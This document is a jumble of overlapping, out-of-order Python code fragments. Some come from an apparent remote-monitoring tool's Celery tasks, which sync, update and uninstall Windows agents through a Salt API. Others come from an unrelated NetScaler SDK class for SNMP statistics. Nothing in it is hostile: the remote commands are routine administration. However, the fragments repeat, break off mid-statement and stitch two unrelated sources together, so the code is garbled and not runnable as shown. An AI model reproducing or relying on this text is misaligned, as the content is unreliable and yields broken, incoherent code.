f\"http://{settings.SALT_HOST}:8123/run\", json=[", "ret = r.json()[\"return\"][0][salt_id] except Exception: attempts += 1 
else: if ret != \"ok\":", "} ], timeout=30, ) except Exception: logger.error(f\"{salt_id} unable to remove salt-key\") return \"ok\"", "Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=35, func=\"saltutil.sync_modules\") # successful sync if new/charnged files: {'return': [{'MINION-15':", "update system info using WMI agents = Agent.objects.all() online = [ i.salt_id for", "return \"ok\" @app.task def batch_sync_modules_task(): # sync modules, split into chunks of 50", "@app.task def uninstall_agent_task(salt_id): attempts = 0 error = False while 1: try: r", "} ], timeout=10, ) ret = r.json()[\"return\"][0][salt_id] except Exception: attempts += 1 else:", "agents = [ i.pk for i in q if pyver.parse(i.version) < pyver.parse(settings.LATEST_AGENT_VER) ]", "i.pk for i in q if pyver.parse(i.version) < pyver.parse(settings.LATEST_AGENT_VER) ] chunks = (agents[i", "Exception: attempts += 1 else: if ret != \"ok\": attempts += 1 else:", "= agent.salt_api_cmd(timeout=35, func=\"saltutil.sync_modules\") # successful sync if new/charnged files: {'return': [{'MINION-15': ['modules.get_eventlog', 'modules.win_agent',", "update_salt_minion_task(): q = Agent.objects.all() agents = [ i.pk for i in q if", "in agents: if agent.status == \"overdue\": outages = AgentOutage.objects.filter(agent=agent) if outages and outages.last().is_active:", "to sync modules {agent.salt_id}\") return logger.info(f\"Successfully synced salt modules on {agent.hostname}\") return \"ok\"", "loguru import logger from time import sleep import random import requests from packaging", "== \"online\" ] chunks = (online[i : i + 30] for i in", "\"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ], timeout=30, ) except Exception: logger.error(f\"{salt_id} unable to", ") sleep(10) @app.task def update_salt_minion_task(): q = Agent.objects.all() agents = [ i.pk for", "Agent.salt_batch_async(minions=chunk, func=\"win_agent.local_sys_info\") sleep(10) @app.task def uninstall_agent_task(salt_id): 
attempts = 0 error = False while", "] chunks = (agents[i : i + 50] for i in range(0, len(agents),", "agents = Agent.objects.all() online = [ i.salt_id for i in agents if not", "30)) for chunk in chunks: for pk in chunk: agent = Agent.objects.get(pk=pk) if", "i + 50] for i in range(0, len(agents), 50)) for chunk in chunks:", "{ \"client\": \"local\", \"tgt\": salt_id, \"fun\": \"win_agent.uninstall_agent\", \"timeout\": 8, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD,", "r = agent.salt_api_cmd(timeout=35, func=\"saltutil.sync_modules\") # successful sync if new/charnged files: {'return': [{'MINION-15': ['modules.get_eventlog',", "15)) outage = AgentOutage.objects.get(pk=pk) outage.send_outage_email() outage.outage_email_sent = True outage.save(update_fields=[\"outage_email_sent\"]) @app.task def agent_recovery_email_task(pk): sleep(random.randint(1,", "r = agent.salt_api_cmd(timeout=30, func=\"win_agent.system_info\") if r == \"timeout\" or r == \"error\": return", "for agent in agents: if agent.status == \"overdue\": outages = AgentOutage.objects.filter(agent=agent) if outages", "uninstalled\") try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"wheel\", \"fun\": \"key.delete\", \"match\":", "Agent.objects.all() online = [ i.salt_id for i in agents if not i.not_supported(\"0.11.0\") and", "len(online), 50)) for chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"saltutil.sync_modules\") sleep(10) @app.task def batch_sysinfo_task(): #", "with no new/changed files: {'return': [{'MINION-15': []}]} if r == \"timeout\" or r", "r = agent.salt_api_async(func=\"win_agent.update_salt\") sleep(20) @app.task def get_wmi_detail_task(pk): agent = Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=30,", "50)) for chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"saltutil.sync_modules\") sleep(10) @app.task def batch_sysinfo_task(): # update", "for chunk in chunks: 
Agent.salt_batch_async(minions=chunk, func=\"win_agent.local_sys_info\") sleep(10) @app.task def uninstall_agent_task(salt_id): attempts = 0", "modules, split into chunks of 50 agents to not overload salt agents =", "{'return': [{'MINION-15': []}]} if r == \"timeout\" or r == \"error\": logger.error(f\"Unable to", "30] for i in range(0, len(online), 30)) for chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"win_agent.local_sys_info\")", "in chunk: agent = Agent.objects.get(pk=pk) if agent.operating_system is not None: if \"64bit\" in", "chunks = (online[i : i + 30] for i in range(0, len(online), 30))", "i.status == \"online\"] chunks = (online[i : i + 50] for i in", "pyver.parse(i.version) < pyver.parse(settings.LATEST_AGENT_VER) ] chunks = (agents[i : i + 30] for i", "Agent, AgentOutage from core.models import CoreSettings logger.configure(**settings.LOG_CONFIG) @app.task def send_agent_update_task(pks, version): assert isinstance(pks,", "range(0, len(agents), 30)) for chunk in chunks: for pk in chunk: agent =", "else settings.DL_32 inno = ( f\"winagent-v{settings.LATEST_AGENT_VER}.exe\" if arch == \"64\" else f\"winagent-v{settings.LATEST_AGENT_VER}-x86.exe\" )", "error = False while 1: try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\":", "uninstall_agent_task(salt_id): attempts = 0 error = False while 1: try: r = requests.post(", "agent in agents: if agent.status == \"overdue\": outages = AgentOutage.objects.filter(agent=agent) if outages and", "inno = ( f\"winagent-v{version}.exe\" if arch == \"64\" else f\"winagent-v{version}-x86.exe\" ) r =", "except Exception: attempts += 1 else: if ret != \"ok\": attempts += 1", "i in q if pyver.parse(i.version) < pyver.parse(settings.LATEST_AGENT_VER) ] chunks = (agents[i : i", "if r == \"timeout\" or r == \"error\": logger.error(f\"Unable to sync modules {agent.salt_id}\")", "range(0, len(online), 30)) for chunk in chunks: Agent.salt_batch_async(minions=chunk, 
func=\"win_agent.local_sys_info\") sleep(10) @app.task def uninstall_agent_task(salt_id):", "time import sleep import random import requests from packaging import version as pyver", "successfully uninstalled\") try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"wheel\", \"fun\": \"key.delete\",", "= AgentOutage.objects.filter(agent=agent) if outages and outages.last().is_active: continue outage = AgentOutage(agent=agent) outage.save() if agent.overdue_email_alert:", "f\"winagent-v{version}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno, \"url\": url, }, )", "online = [ i.salt_id for i in agents if not i.not_supported(\"0.11.0\") and i.status", "outages and outages.last().is_active: continue outage = AgentOutage(agent=agent) outage.save() if agent.overdue_email_alert: agent_outage_email_task.delay(pk=outage.pk) if agent.overdue_text_alert:", "modules on {agent.hostname}\") return \"ok\" @app.task def batch_sync_modules_task(): # sync modules, split into", "Agent.objects.all() agents = [ i.pk for i in q if pyver.parse(i.version) >= pyver.parse(\"0.11.0\")", "agents = Agent.objects.all() online = [i.salt_id for i in agents if i.status ==", "chunk: agent = Agent.objects.get(pk=pk) r = agent.salt_api_async(func=\"win_agent.update_salt\") sleep(20) @app.task def get_wmi_detail_task(pk): agent =", "in agents if not i.not_supported(\"0.11.0\") and i.status == \"online\" ] chunks = (online[i", "arch = \"64\" elif \"32bit\" in agent.operating_system: arch = \"32\" else: arch =", "if not i.not_supported(\"0.11.0\") and i.status == \"online\" ] chunks = (online[i : i", "= 0 if attempts >= 10: error = True break elif attempts ==", "\"online\"] chunks = (online[i : i + 50] for i in range(0, len(online),", "while 1: try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"local\", \"tgt\": salt_id,", "= AgentOutage.objects.get(pk=pk) 
outage.send_recovery_email() outage.recovery_email_sent = True outage.save(update_fields=[\"recovery_email_sent\"]) @app.task def agent_outages_task(): agents = Agent.objects.only(\"pk\")", "= agent.salt_api_async(func=\"win_agent.update_salt\") sleep(20) @app.task def get_wmi_detail_task(pk): agent = Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=30, func=\"win_agent.system_info\")", "Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=30, func=\"win_agent.system_info\") if r == \"timeout\" or r == \"error\":", "not overload salt agents = Agent.objects.all() online = [i.salt_id for i in agents", "else: logger.info(f\"{salt_id} was successfully uninstalled\") try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\":", "15)) outage = AgentOutage.objects.get(pk=pk) outage.send_recovery_email() outage.recovery_email_sent = True outage.save(update_fields=[\"recovery_email_sent\"]) @app.task def agent_outages_task(): agents", "in agent.operating_system: arch = \"32\" else: arch = \"64\" url = settings.DL_64 if", "func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno, \"url\": url, }, ) sleep(10) @app.task def update_salt_minion_task(): q", "settings.DL_64 if arch == \"64\" else settings.DL_32 inno = ( f\"winagent-v{version}.exe\" if arch", "import sleep import random import requests from packaging import version as pyver from" ]
[ "try : result = service.payload_formatter.string_to_resource(snmp_response, response, self.__class__.__name__.replace('_stats','')) if(result.errorcode != 0) : if (result.errorcode", "except Exception as e: raise e @property def snmptotbadversions(self) : \"\"\"Number of SNMP", "KIND, either express or implied. # See the License for the specific language", "= 0 self._snmptottraps = 0 self._snmptoterrreqdropped = 0 self._snmptotparseerrs = 0 self._snmptotbadversions =", "Unless required by applicable law or agreed to in writing, software # distributed", "NetScaler.\"\"\" try : return self._snmptotbadcommname except Exception as e: raise e @property def", "try : return self._snmprxpktsrate except Exception as e: raise e def _get_nitro_response(self, service,", "raise e @property def snmpunknownusername(self) : \"\"\"SNMP packets that were dropped because they", "Exception as e: raise e @property def snmptoterrreqdropped(self) : \"\"\"SNMP requests dropped.\"\"\" try", "= 0 self._snmptotresponses = 0 self._snmpresponsesrate = 0 self._snmptottraps = 0 self._snmptoterrreqdropped =", "processed.\"\"\" try : return self._snmptotgetreqs except Exception as e: raise e @property def", ": \"\"\"Use this API to fetch the statistics of all snmp_stats resources that", "been generated by the NetScaler.\"\"\" try : return self._snmptottraps except Exception as e:", "def snmpgetnextreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetnextreqs.\"\"\" try : return self._snmpgetnextreqsrate except", "try : return self._snmpunknownusername except Exception as e: raise e @property def snmpunsupportedsecuritylevel(self)", "requests dropped.\"\"\" try : return self._snmptoterrreqdropped except Exception as e: raise e @property", "e def _get_nitro_response(self, service, response) : \"\"\"converts nitro response into object and returns", "SNMP Messages.\"\"\" try : return self._snmptotparseerrs except Exception as e: raise e @property", "@property def snmptottraps(self) : \"\"\"SNMP 
Trap PDUs that have been generated by the", "the Apache License, Version 2.0 (the \"License\") # you may not use this", "array in case of get request. :param service: :param response: \"\"\" try :", "__init__(self) : self._clearstats = \"\" self._snmptotrxpkts = 0 self._snmprxpktsrate = 0 self._snmptottxpkts =", "\"\"\" \"\"\" def __init__(self) : self._clearstats = \"\" self._snmptotrxpkts = 0 self._snmprxpktsrate =", "result.severity : if (result.severity == \"ERROR\") : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) else :", "this file except in compliance with the License. # You may obtain a", "\"\"\" try : return self._snmpunsupportedsecuritylevel except Exception as e: raise e @property def", "0 self._snmpdecryptionerrors = 0 @property def clearstats(self) : \"\"\"Clear the statsistics / counters.<br/>Possible", "as e: raise e @property def snmpgetreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetreqs.\"\"\"", "0 self._snmpwrongdigests = 0 self._snmpdecryptionerrors = 0 @property def clearstats(self) : \"\"\"Clear the", "self._snmptotrxpkts except Exception as e: raise e @property def snmptottxpkts(self) : \"\"\"SNMP packets", "and processed.\"\"\" try : return self._snmptotgetnextreqs except Exception as e: raise e @property", "= 0 self._snmptotbadcommname = 0 self._snmptotbadcommuse = 0 self._snmpunsupportedsecuritylevel = 0 self._snmpnotintimewindow =", "snmptottxpkts.\"\"\" try : return self._snmptxpktsrate except Exception as e: raise e @property def", ": return self._snmptotbadcommname except Exception as e: raise e @property def snmptotgetnextreqs(self) :", "# from nitro.resource.base.base_resource import base_resource from nitro.resource.base.base_resource import base_response from nitro.service.options import options", "clearstats) : \"\"\"Clear the statsistics / counters :param clearstats: \"\"\" try : self._clearstats", ": return self._snmpunknownusername except Exception as e: raise e @property def 
snmpunsupportedsecuritylevel(self) :", "service.payload_formatter.string_to_resource(snmp_response, response, self.__class__.__name__.replace('_stats','')) if(result.errorcode != 0) : if (result.errorcode == 444) : service.clear_session(self)", "except Exception as e : raise e def _get_object_name(self) : \"\"\"Returns the value", "snmp_response(base_response) : \"\"\" \"\"\" def __init__(self, length=1) : self.snmp = [] self.errorcode =", "try : return self._snmptottraps except Exception as e: raise e @property def snmptotbadversions(self)", "(/s) counter for snmptotgetbulkreqs.\"\"\" try : return self._snmpgetbulkreqsrate except Exception as e: raise", "have been accepted and proZcessed.\"\"\" try : return self._snmptotgetbulkreqs except Exception as e:", "Exception as e: raise e def _get_nitro_response(self, service, response) : \"\"\"converts nitro response", "ANY KIND, either express or implied. # See the License for the specific", "snmprxpktsrate(self) : \"\"\"Rate (/s) counter for snmptotrxpkts.\"\"\" try : return self._snmprxpktsrate except Exception", "0 self._snmptoterrreqdropped = 0 self._snmptotparseerrs = 0 self._snmptotbadversions = 0 self._snmptotbadcommname = 0", "self._snmptottxpkts except Exception as e: raise e @property def snmptotparseerrs(self) : \"\"\"Number of", "except Exception as e: raise e @property def snmptottraps(self) : \"\"\"SNMP Trap PDUs", "0 self._snmptotgetbulkreqs = 0 self._snmpgetbulkreqsrate = 0 self._snmptotresponses = 0 self._snmpresponsesrate = 0", "full.\"\"\" try : return self._clearstats except Exception as e: raise e @clearstats.setter def", ": result = service.payload_formatter.string_to_resource(snmp_response, response, self.__class__.__name__.replace('_stats','')) if(result.errorcode != 0) : if (result.errorcode ==", ": raise e @classmethod def get(cls, service, name=\"\", option_=\"\") : \"\"\"Use this API", "SNMP messages received, which were for an unsupported SNMP version.\"\"\" try : return", "when decoding 
received SNMP Messages.\"\"\" try : return self._snmptotparseerrs except Exception as e:", "except Exception as e: raise e @clearstats.setter def clearstats(self, clearstats) : \"\"\"Clear the", "they referenced a user that was not known to the SNMP engine.\"\"\" try", "@property def snmptxpktsrate(self) : \"\"\"Rate (/s) counter for snmptottxpkts.\"\"\" try : return self._snmptxpktsrate", ": return self._snmpunknownengineids except Exception as e: raise e @property def snmpwrongdigests(self) :", "0 self._snmpgetbulkreqsrate = 0 self._snmptotresponses = 0 self._snmpresponsesrate = 0 self._snmptottraps = 0", "as e: raise e @clearstats.setter def clearstats(self, clearstats) : \"\"\"Clear the statsistics /", "they requested a security level that was unknown to the NetScaler or otherwise", "as e: raise e @property def snmptotgetreqs(self) : \"\"\"SNMP Get-Request PDUs that have", "= 0 self._snmptottxpkts = 0 self._snmptxpktsrate = 0 self._snmptotgetreqs = 0 self._snmpgetreqsrate =", ": \"\"\"Rate (/s) counter for snmptotresponses.\"\"\" try : return self._snmpresponsesrate except Exception as", "raise e @property def snmprxpktsrate(self) : \"\"\"Rate (/s) counter for snmptotrxpkts.\"\"\" try :", "e: raise e @property def snmptotbadcommuse(self) : \"\"\"The total number of SNMP Messages", ": return 0 except Exception as e : raise e @classmethod def get(cls,", "service, name=\"\", option_=\"\") : \"\"\"Use this API to fetch the statistics of all", "e @property def snmpgetbulkreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetbulkreqs.\"\"\" try : return", "WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
# See", "= \"\" self._snmptotrxpkts = 0 self._snmprxpktsrate = 0 self._snmptottxpkts = 0 self._snmptxpktsrate =", "0 @property def clearstats(self) : \"\"\"Clear the statsistics / counters.<br/>Possible values = basic,", "received that represented an SNMP operation which was not allowed by the SNMP", "total number of SNMP Messages received that represented an SNMP operation which was", "try : return self._snmptotparseerrs except Exception as e: raise e @property def snmptottraps(self)", "e: raise e @property def snmpnotintimewindow(self) : \"\"\"SNMP packets that were dropped because", ":param service: :param response: \"\"\" try : result = service.payload_formatter.string_to_resource(snmp_response, response, self.__class__.__name__.replace('_stats','')) if(result.errorcode", "netscaler. :param service: :param name: (Default value = \"\") :param option_: (Default value", "(/s) counter for snmptotresponses.\"\"\" try : return self._snmpresponsesrate except Exception as e: raise", "e: raise e @property def snmptotgetnextreqs(self) : \"\"\"SNMP Get-Next PDUs that have been", "self._snmpnotintimewindow except Exception as e: raise e @property def snmptotgetbulkreqs(self) : \"\"\"SNMP Get-Bulk", "e: raise e @property def snmptotbadcommname(self) : \"\"\"SNMP messages received, which used an", "Exception as e: raise e @property def snmpgetbulkreqsrate(self) : \"\"\"Rate (/s) counter for", "0 self._snmptotbadcommname = 0 self._snmptotbadcommuse = 0 self._snmpunsupportedsecuritylevel = 0 self._snmpnotintimewindow = 0", "did not contain the expected digest value.\"\"\" try : return self._snmpwrongdigests except Exception", "e: raise e @property def snmptotparseerrs(self) : \"\"\"Number of ASN.1 or BER errors", "service.clear_session(self) if result.severity : if (result.severity == \"ERROR\") : raise nitro_exception(result.errorcode, str(result.message), str(result.severity))", "def __init__(self, length=1) : self.snmp = [] self.errorcode = 0 self.message = \"\"", ": 
\"\"\"SNMP packets that were dropped because they appeared outside of the authoritative", "def snmpunsupportedsecuritylevel(self) : \"\"\"SNMP packets that were dropped because they requested a security", "IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or", "raise e @classmethod def get(cls, service, name=\"\", option_=\"\") : \"\"\"Use this API to", "snmpunknownengineids(self) : \"\"\"SNMP packets that were dropped because they referenced an SNMP engine", "def snmptotparseerrs(self) : \"\"\"Number of ASN.1 or BER errors encountered when decoding received", "not allowed by the SNMP community named in the Message.\"\"\" try : return", "= 0 self.message = \"\" self.severity = \"\" self.sessionid = \"\" self.snmp =", "as e: raise e @property def snmptotbadcommname(self) : \"\"\"SNMP messages received, which used", "\"\"\"Returns the value of object identifier argument\"\"\" try : return 0 except Exception", "of all snmp_stats resources that are configured on netscaler. :param service: :param name:", "accepted and processed.\"\"\" try : return self._snmptotgetnextreqs except Exception as e: raise e", "OF ANY KIND, either express or implied. 
# See the License for the", "as e: raise e def _get_nitro_response(self, service, response) : \"\"\"converts nitro response into", "by the NetScaler.\"\"\" try : return self._snmptottraps except Exception as e: raise e", "PDUs that have been accepted and processed.\"\"\" try : return self._snmptotgetreqs except Exception", "as e: raise e @property def snmpunknownusername(self) : \"\"\"SNMP packets that were dropped", ": \"\"\"converts nitro response into object and returns the object array in case", ": \"\"\"SNMP Get-Response PDUs that have been generated by the NetScaler.\"\"\" try :", "e @property def snmptotbadversions(self) : \"\"\"Number of SNMP messages received, which were for", "an unsupported SNMP version.\"\"\" try : return self._snmptotbadversions except Exception as e: raise", ": return self._snmptotgetnextreqs except Exception as e: raise e @property def snmpunknownengineids(self) :", "def snmptotbadversions(self) : \"\"\"Number of SNMP messages received, which were for an unsupported", "= 0 self._snmpunsupportedsecuritylevel = 0 self._snmpnotintimewindow = 0 self._snmpunknownusername = 0 self._snmpunknownengineids =", "BER errors encountered when decoding received SNMP Messages.\"\"\" try : return self._snmptotparseerrs except", "self._snmpunknownusername except Exception as e: raise e @property def snmpunsupportedsecuritylevel(self) : \"\"\"SNMP packets", "the expected digest value.\"\"\" try : return self._snmpwrongdigests except Exception as e: raise", "self._snmptottraps = 0 self._snmptoterrreqdropped = 0 self._snmptotparseerrs = 0 self._snmptotbadversions = 0 self._snmptotbadcommname", "snmptotresponses(self) : \"\"\"SNMP Get-Response PDUs that have been generated by the NetScaler.\"\"\" try", "Exception as e : raise e @classmethod def get(cls, service, name=\"\", option_=\"\") :", "ASN.1 or BER errors encountered when decoding received SNMP Messages.\"\"\" try : return", "snmptotgetnextreqs.\"\"\" try : return self._snmpgetnextreqsrate except 
Exception as e: raise e @property def", ": \"\"\"Returns the value of object identifier argument\"\"\" try : return 0 except", "= 0 self._snmptotparseerrs = 0 self._snmptotbadversions = 0 self._snmptotbadcommname = 0 self._snmptotbadcommuse =", ": \"\"\"SNMP packets transmitted.\"\"\" try : return self._snmptottxpkts except Exception as e: raise", "except Exception as e : raise e @classmethod def get(cls, service, name=\"\", option_=\"\")", "on netscaler. :param service: :param name: (Default value = \"\") :param option_: (Default", "e @property def snmpgetnextreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetnextreqs.\"\"\" try : return", "packets that were dropped because they could not be decrypted.\"\"\" try : return", "which were for an unsupported SNMP version.\"\"\" try : return self._snmptotbadversions except Exception", "the statsistics / counters.<br/>Possible values = basic, full.\"\"\" try : return self._clearstats except", "they could not be decrypted.\"\"\" try : return self._snmpdecryptionerrors except Exception as e:", ": if (result.errorcode == 444) : service.clear_session(self) if result.severity : if (result.severity ==", "self._snmptotgetbulkreqs = 0 self._snmpgetbulkreqsrate = 0 self._snmptotresponses = 0 self._snmpresponsesrate = 0 self._snmptottraps", "raise e @property def snmptoterrreqdropped(self) : \"\"\"SNMP requests dropped.\"\"\" try : return self._snmptoterrreqdropped", "that was not known to the SNMP engine.\"\"\" try : return self._snmpunknownusername except", "allowed by the SNMP community named in the Message.\"\"\" try : return self._snmptotbadcommuse", "\"\"\"Rate (/s) counter for snmptotresponses.\"\"\" try : return self._snmpresponsesrate except Exception as e:", "raise e @property def snmptotbadcommname(self) : \"\"\"SNMP messages received, which used an SNMP", "except Exception as e: raise e @property def snmpresponsesrate(self) : \"\"\"Rate (/s) counter", "in the Message.\"\"\" try : return self._snmptotbadcommuse 
except Exception as e: raise e", "the SNMP engine.\"\"\" try : return self._snmpunknownusername except Exception as e: raise e", "Exception as e: raise e @property def snmprxpktsrate(self) : \"\"\"Rate (/s) counter for", "= obj.stat_resources(service, option_) return response except Exception as e: raise e class Clearstats:", "engine ID that was not known to the NetScaler.\"\"\" try : return self._snmpunknownengineids", "class snmp_stats(base_resource) : \"\"\" \"\"\" def __init__(self) : self._clearstats = \"\" self._snmptotrxpkts =", "have been generated by the NetScaler.\"\"\" try : return self._snmptottraps except Exception as", "def snmptotrxpkts(self) : \"\"\"SNMP packets received.\"\"\" try : return self._snmptotrxpkts except Exception as", "software # distributed under the License is distributed on an \"AS IS\" BASIS,", ": \"\"\"SNMP messages received, which used an SNMP community name not known to", "counter for snmptotgetbulkreqs.\"\"\" try : return self._snmpgetbulkreqsrate except Exception as e: raise e", ": \"\"\"Clear the statsistics / counters.<br/>Possible values = basic, full.\"\"\" try : return", "self._snmpgetnextreqsrate = 0 self._snmptotgetbulkreqs = 0 self._snmpgetbulkreqsrate = 0 self._snmptotresponses = 0 self._snmpresponsesrate", "self._snmptotresponses except Exception as e: raise e @property def snmptotbadcommuse(self) : \"\"\"The total", "service: :param response: \"\"\" try : result = service.payload_formatter.string_to_resource(snmp_response, response, self.__class__.__name__.replace('_stats','')) if(result.errorcode !=", "class snmp_response(base_response) : \"\"\" \"\"\" def __init__(self, length=1) : self.snmp = [] self.errorcode", "# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to", "transmitted.\"\"\" try : return self._snmptottxpkts except Exception as e: raise e @property def", ": \"\"\"Clear the statsistics / counters :param clearstats: \"\"\" try : self._clearstats =", "\"\") 
:param option_: (Default value = \"\") \"\"\" try : obj = snmp_stats()", "that have been generated by the NetScaler.\"\"\" try : return self._snmptottraps except Exception", "\"\"\"Number of SNMP messages received, which were for an unsupported SNMP version.\"\"\" try", "Get-Response PDUs that have been generated by the NetScaler.\"\"\" try : return self._snmptotresponses", "Exception as e: raise e @property def snmptotparseerrs(self) : \"\"\"Number of ASN.1 or", "\"\"\"SNMP packets that were dropped because they referenced an SNMP engine ID that", "request. :param service: :param response: \"\"\" try : result = service.payload_formatter.string_to_resource(snmp_response, response, self.__class__.__name__.replace('_stats',''))", "0 self._snmpgetnextreqsrate = 0 self._snmptotgetbulkreqs = 0 self._snmpgetbulkreqsrate = 0 self._snmptotresponses = 0", "requested a security level that was unknown to the NetScaler or otherwise unavailable.", "= 0 self._snmpnotintimewindow = 0 self._snmpunknownusername = 0 self._snmpunknownengineids = 0 self._snmpwrongdigests =", "Licensed under the Apache License, Version 2.0 (the \"License\") # you may not", "from nitro.resource.base.base_resource import base_response from nitro.service.options import options from nitro.exception.nitro_exception import nitro_exception from", "raise e @property def snmpgetbulkreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetbulkreqs.\"\"\" try :", "try : return self._snmptotresponses except Exception as e: raise e @property def snmptotbadcommuse(self)", "that were dropped because they appeared outside of the authoritative SNMP engine's window.\"\"\"", "option_: (Default value = \"\") \"\"\" try : obj = snmp_stats() if not", "under the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES", "self._snmptotgetnextreqs = 0 self._snmpgetnextreqsrate = 0 self._snmptotgetbulkreqs = 0 self._snmpgetbulkreqsrate = 0 self._snmptotresponses", "the License at # # 
http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law", "Get-Next PDUs that have been accepted and processed.\"\"\" try : return self._snmptotgetnextreqs except", "def snmptottraps(self) : \"\"\"SNMP Trap PDUs that have been generated by the NetScaler.\"\"\"", "that have been accepted and processed.\"\"\" try : return self._snmptotgetnextreqs except Exception as", "\"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express", "self._snmpgetbulkreqsrate except Exception as e: raise e @property def snmpnotintimewindow(self) : \"\"\"SNMP packets", "nitro.exception.nitro_exception import nitro_exception from nitro.util.nitro_util import nitro_util class snmp_stats(base_resource) : \"\"\" \"\"\" def", "PDUs that have been accepted and processed.\"\"\" try : return self._snmptotgetnextreqs except Exception", "snmptotgetreqs(self) : \"\"\"SNMP Get-Request PDUs that have been accepted and processed.\"\"\" try :", "that were dropped because they requested a security level that was unknown to", "\"basic\" full = \"full\" class snmp_response(base_response) : \"\"\" \"\"\" def __init__(self, length=1) :", "self._snmptotrxpkts = 0 self._snmprxpktsrate = 0 self._snmptottxpkts = 0 self._snmptxpktsrate = 0 self._snmptotgetreqs", "as e: raise e @property def snmptotrxpkts(self) : \"\"\"SNMP packets received.\"\"\" try :", "self._snmpunknownengineids except Exception as e: raise e @property def snmpwrongdigests(self) : \"\"\"SNMP packets", "as e: raise e @property def snmpunsupportedsecuritylevel(self) : \"\"\"SNMP packets that were dropped", "the object array in case of get request. 
:param service: :param response: \"\"\"", "e @property def snmpwrongdigests(self) : \"\"\"SNMP packets that were dropped because they did", "community name not known to the NetScaler.\"\"\" try : return self._snmptotbadcommname except Exception", "required by applicable law or agreed to in writing, software # distributed under", "return self._snmptotgetnextreqs except Exception as e: raise e @property def snmpunknownengineids(self) : \"\"\"SNMP", "the NetScaler.\"\"\" try : return self._snmptottraps except Exception as e: raise e @property", "by the SNMP community named in the Message.\"\"\" try : return self._snmptotbadcommuse except", "@property def snmpgetreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetreqs.\"\"\" try : return self._snmpgetreqsrate", ": return self._snmptoterrreqdropped except Exception as e: raise e @property def snmpgetnextreqsrate(self) :", "counter for snmptottxpkts.\"\"\" try : return self._snmptxpktsrate except Exception as e: raise e", "as e: raise e @property def snmpgetbulkreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetbulkreqs.\"\"\"", "service, response) : \"\"\"converts nitro response into object and returns the object array", "was not allowed by the SNMP community named in the Message.\"\"\" try :", "except Exception as e: raise e @property def snmptotrxpkts(self) : \"\"\"SNMP packets received.\"\"\"", "applicable law or agreed to in writing, software # distributed under the License", "packets that were dropped because they referenced an SNMP engine ID that was", "returns the object array in case of get request. 
:param service: :param response:", "window.\"\"\" try : return self._snmpnotintimewindow except Exception as e: raise e @property def", "self._snmptotparseerrs = 0 self._snmptotbadversions = 0 self._snmptotbadcommname = 0 self._snmptotbadcommuse = 0 self._snmpunsupportedsecuritylevel", "snmptoterrreqdropped(self) : \"\"\"SNMP requests dropped.\"\"\" try : return self._snmptoterrreqdropped except Exception as e:", "= snmp_stats() if not name : response = obj.stat_resources(service, option_) return response except", ": self._clearstats = clearstats except Exception as e: raise e @property def snmpdecryptionerrors(self)", "NetScaler.\"\"\" try : return self._snmptottraps except Exception as e: raise e @property def", "to fetch the statistics of all snmp_stats resources that are configured on netscaler.", "raise e def _get_nitro_response(self, service, response) : \"\"\"converts nitro response into object and", "try : return self._snmptotrxpkts except Exception as e: raise e @property def snmptottxpkts(self)", "self._snmpwrongdigests except Exception as e: raise e @property def snmpgetbulkreqsrate(self) : \"\"\"Rate (/s)", "(c) 2008-2015 Citrix Systems, Inc. 
# # Licensed under the Apache License, Version", "or agreed to in writing, software # distributed under the License is distributed", "options from nitro.exception.nitro_exception import nitro_exception from nitro.util.nitro_util import nitro_util class snmp_stats(base_resource) : \"\"\"", "clearstats: \"\"\" try : self._clearstats = clearstats except Exception as e: raise e", "try : return self._clearstats except Exception as e: raise e @clearstats.setter def clearstats(self,", "not be decrypted.\"\"\" try : return self._snmpdecryptionerrors except Exception as e: raise e", "they did not contain the expected digest value.\"\"\" try : return self._snmpwrongdigests except", "that were dropped because they referenced a user that was not known to", "e @property def snmpdecryptionerrors(self) : \"\"\"SNMP packets that were dropped because they could", "e @property def snmptotparseerrs(self) : \"\"\"Number of ASN.1 or BER errors encountered when", "0 self._snmpgetreqsrate = 0 self._snmptotgetnextreqs = 0 self._snmpgetnextreqsrate = 0 self._snmptotgetbulkreqs = 0", ": \"\"\"Rate (/s) counter for snmptottxpkts.\"\"\" try : return self._snmptxpktsrate except Exception as", ": \"\"\"SNMP requests dropped.\"\"\" try : return self._snmptoterrreqdropped except Exception as e: raise", "Exception as e: raise e @property def snmptotgetnextreqs(self) : \"\"\"SNMP Get-Next PDUs that", "= 0 self._snmpgetnextreqsrate = 0 self._snmptotgetbulkreqs = 0 self._snmpgetbulkreqsrate = 0 self._snmptotresponses =", "have been generated by the NetScaler.\"\"\" try : return self._snmptotresponses except Exception as", "resources that are configured on netscaler. :param service: :param name: (Default value =", "CONDITIONS OF ANY KIND, either express or implied. 
